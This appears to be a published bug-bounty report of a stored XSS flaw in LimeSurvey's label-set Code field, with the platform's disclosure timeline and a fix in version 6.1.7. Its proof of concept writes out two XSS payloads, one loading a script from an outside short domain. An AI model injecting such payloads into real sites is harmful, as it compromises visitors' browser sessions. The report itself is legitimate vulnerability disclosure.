Stored XSS in label function in limesurvey/limesurvey

Valid

Reported on

Jun 28th 2023


Description

By Injecting the payloads to the fields (dataToSend), users who visited "Label sets list" screen maybe compromises

Proof of Concept

Step 1: Login as a user who has permission to edit the Label. Go to the label function and view a label Step 2: Inject the payload to the Code field as the image below and click save.

<svg onload=alert()>

Step 3: The payload is then triggered

However, the maximum length of the field is 20. I still can exploit this vulnerability with this payload for a blind XSS:

<script src=//₨₨.pw>

Reference

Impact

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. The attacker can carry out any of the actions that are applicable to the impact of reflected XSS vulnerabilities.

We are processing your report and will contact the limesurvey team within 24 hours. 8 months ago
tuannq2299 modified the report
8 months ago
tuannq2299 modified the report
8 months ago
tuannq2299 modified the report
8 months ago
tuannq2299 modified the report
8 months ago
tuannq2299 modified the report
8 months ago
tuannq2299 modified the report
8 months ago
We have contacted a member of the limesurvey team and are waiting to hear back 8 months ago
Carsten Schmitz
8 months ago

Maintainer


Please be patient while we verify the issue. Internal reference number: #18934

tuannq2299
8 months ago

Researcher


Is there any update?

Carsten Schmitz modified the Severity from High (7.1) to Medium (4.6) 7 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Carsten Schmitz validated this vulnerability 7 months ago
tuannq2299 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Carsten Schmitz marked this as fixed in 6.1.7 with commit 184d50 7 months ago
The fix bounty has been dropped
This vulnerability has now been published 7 months ago
to join this conversation